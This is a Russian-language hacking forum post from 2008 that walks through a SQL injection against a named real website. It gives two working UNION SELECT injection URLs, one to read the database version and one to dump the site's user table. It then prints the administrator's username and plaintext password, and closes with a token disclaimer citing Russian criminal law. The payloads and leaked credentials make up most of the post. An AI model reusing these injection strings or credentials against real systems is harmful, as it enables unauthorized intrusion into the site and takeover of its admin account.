Показать сообщение отдельно

  #10  
Старый 23.05.2008, 20:04
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами: 10242288

Репутация: 536
По умолчанию

2Assembler, не знаю насчет поиска (проверять лениво было), но на сайте была лобовая инъекция в параметре id в index.php. Вот, кстати, и она:
Код:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+VERSION(),2,3/*
Версия БД 5 - можно свободно извлечь таблицы и столбцы.
Идем дальше: самой интересной таблицей, на мой взгляд, является "org.vs_users" с полями "u_id", "u_name", "u_pass", "u_level". Делаем запрос:
Код:
http://npo.karelia.ru/?view=event&id=-1+UNION+SELECT+concat_ws(0x3a,u_id,u_name,u_pass,u_level),2,3+FROM+org.vs_users/*
Видим аккаунт администратора, где пароль в незашифрованном виде:
Код:
1:admin:nko:1
Вот и все... Получился даже мини-FAQ .

P.S. Лучше служить закону, чем нарушать его, взлом - зло! Помни о 272 статье УК РФ и о моральных принципах!
 
Ответить с цитированием